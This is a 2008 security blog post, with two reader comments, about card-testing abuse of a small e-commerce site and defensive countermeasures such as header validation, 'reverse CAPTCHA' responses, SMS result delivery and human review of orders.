Yesterday on PhishMe, I talked about my trip to Chicago to visit my good friend Sachin. While out there, we hung out with his buddy John who works for a small web design firm. John's firm sells quite a few e-commerce sites, and he had an interesting tale of a DoS attack against one of their client sites.
Except, DoS wasn't the intended purpose of the attack. The attackers were actually abusing the web application to scrub a list of credit cards in order to figure out which ones were good. The DoS occurred when Authorize.NET stopped accepting transactions from the site, preventing legit customers from making purchases.
Their immediate solution was to block the offending IP which stopped the attack. But the vulnerability still existed in the application, so they put in further validation, the details of which we didn't really get into.
I made the argument that no matter what kind of validation you put in place, you still need to let anonymous users place orders with credit cards. Additionally, you can't effectively block malicious users from placing an infinite number of orders because:
1. Malicious users can utilize open proxies, preventing IP filtering.
2. Malicious users can utilize multiple identities and credit card numbers, so you can't just block John Q. Hacker.
3. Limits on sessions won't help, since attackers can just get new session tokens.
John pretty much agreed, and added that they now have an added sense of vigilance and more actively monitor usage of their sites. Unfortunately, this monitoring is all done manually, which doesn't make for a scalable solution.
Monitoring, both manual and even automated, is also only effective against stupid attackers who don't throttle and/or don't make an effort to make their HTTP requests look legit. A savvy attacker should be able to randomize the time between his automated requests, as well as automatically utilize a large number of open proxies to hide his true intentions. If the attacker does some homework and determines the number of legitimate orders a given web site handles per day, he should be able to throttle his requests such that no red flags will be raised.
Below is a list of possible countermeasures that could be deployed to prevent such abuse and automation.
1. Make the attacker, but not browser based users, jump through hoops. Enforce strict HTTP request validation on critical transactional URLs. Make sure any header a normal browser would send is present in the request.
2. Reverse CAPTCHA. Build a response that a human can understand, but would be difficult for an automated bot to interpret. Show a picture of some dogs, and display a message to the effect of: "If you see 3 golden retrievers in this picture, your order was successful."
3. Use alternate communication channels for response data. An easy one would be to SMS the transaction result to a mobile number. Of course, you can't rely on all users being able to receive SMS...
4. Use a combination of numbers two and three, and make your process dynamic.
There are two themes to these countermeasures:
1. Make your process complicated to automate.
2. Make your responses hard to interpret programatically.
And one last idea. If you're content with monitoring for the time being, you still need to be able to react when you see someone doing something naughty. In the case of credit card validation abuse, an easy countermeasure would be to easily disable real time processing. Your site will still be accepting orders, but they won't be processed until after human review.
Tuesday, April 8, 2008
Preventing BlackHat Automation
Subscribe to:
Post Comments (Atom)
2 comments:
This is exactly what CAPTCHAs are designed for. To prove that a human is on the other side of the transaction. There's no need to bother with fancy 'reverse captchas' which will only confuse your users. Just require a CAPTCHA to be satisfied as a part of the same form where the credit card is entered. As to the effectiveness of CAPTCHAs, well, they're a lot better than nothing.
rezn
Very true. I was trying to think of ways to make captcha's harder to crack, but easier to for people to use. Something along the lines of http://research.microsoft.com/asirra/
and http://www.rorsecurity.info/2008/04/04/webappsec-the-idea-of-negative-captchas/.
If you don't make the user jump through hoops (decipher an unreadable captcha) but make human evaluation required for interpreting the results/data from the transaction you are trying to protect, you achieve the same results.
Is it easier then a regular captch? Perhaps not.
Post a Comment